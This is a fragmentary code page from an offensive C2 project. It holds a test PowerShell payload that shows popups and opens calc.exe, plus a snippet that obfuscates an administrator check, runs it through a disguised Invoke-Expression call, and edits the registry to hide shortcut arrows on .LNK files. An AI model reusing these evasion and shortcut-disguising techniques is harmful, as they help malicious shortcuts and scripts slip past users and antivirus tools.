Payload.ps1 to test Invoke-Shortcut.ps1

   Author: @r00t-3xp10it
   Helper - Payload.ps1 to test Invoke-Shortcut.ps1

   Put this cmdlet on %TMP% directory to be exec with or without arguments

   PS C:\> powershell -file Payload.ps1

   PS C:\> powershell -file Payload.ps1 -action info
   PS C:\> powershell -file Payload.ps1 -action calc 

[CmdletBinding(PositionalBinding=$false)] param(

If($action -match 'info')
   powershell (nEW-ObjeCt -ComObjEct Wscript.Shell).Popup("Executing INFORMATION",4,"Payload.ps1",0+64)
   powershell (nEW-ObjeCt -ComObjEct Wscript.Shell).Popup("Executing Payload.ps1 and calc.exe",4,"Payload.ps1",0+64)
   Start-Process calc.exe

Copy link

Invoke-Shortcut under meterpeter C2


Delete arrow simbol from .LNK file ???
{ add funtion to -LOLBIN switch ?? - requires restart }


   ## Check shell_Privileges hold
   $TomarPrevidencias = '@[bo£o@l]#((@[£Sy@st£e@m.£S@ec£u#r@it@y.@P£r#i@n£cip@al.#W£i@n£d#o£w@sI£d@e#n£t@it@y]:£:#G@e£tC£u@r£r#e@n£#t(£)).£g#r@o£u@p£s# -m£a@t#c@h "£S-@1-#5££-3@2-#5£4@4")' -replace '(@|#|£)',''
   $IsClientAdmin = $TomarPrevidencias|&('Sex' -replace '^(S)','i')
   If($IsClientAdmin -match '^(True)$')
      ## Delete arrows from LNK files?
      # Remark: Administrator privileges required {creates an EMPTY /d "data" value}
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /v 29 /t REG_SZ /f|Out-Null

      ## Revert
      # REG DELETE "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons" /f|Out-Null

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